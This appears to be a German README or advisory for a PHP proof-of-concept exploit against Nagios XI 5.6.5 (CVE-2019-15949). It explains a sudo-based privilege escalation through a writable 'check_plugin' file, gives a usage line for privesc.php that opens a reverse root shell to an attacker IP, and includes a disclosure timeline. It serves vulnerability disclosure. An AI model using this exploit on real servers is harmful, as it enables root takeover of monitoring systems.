
POC, der eine Schwachstelle in Nagios XI (5.6.5) ausnutzt, um eine Root-Shell zu starten.
In Nagios XI <= 5.6.5 existiert eine Schwachstelle, die es einem Angreifer ermöglicht, eine RCE auszunutzen, um die Rechte auf Root auszuweiten.
Der Exploit erfordert Zugriff auf den Server als Benutzer 'nagios' oder CCM-Zugriff über die Weboberfläche mit Berechtigungen zur Verwaltung von Plugins.
Das Skript getprofile.sh, das durch das Herunterladen eines Systemprofils (profile.php?cmd=download) aufgerufen wird, wird über einen passwortlosen sudo-Eintrag als Root ausgeführt; das Skript führt die ausführbare Datei ‘check_plugin’ aus, die dem Benutzer nagios gehört.
Ein Benutzer, der bei Nagios XI mit Berechtigungen zum Ändern von Plugins angemeldet ist, oder der Benutzer 'nagios' auf dem Server, kann die ausführbare Datei ‘check_plugin’ ändern und schädliche Befehle einfügen, die als Root ausgeführt werden können.
Es wurde ein PHP-POC entwickelt, der eine Payload hochlädt, die zu einer Reverse-Root-Shell führt.
Verwendung:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
Gemeldet an Nagios am: 29. Juli 2019
Von Nagios bestätigt am: 29. Juli 2019
Behoben in Version: 5.6.6 am: 20. August 2019
CVE zugewiesen am: 6. September 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
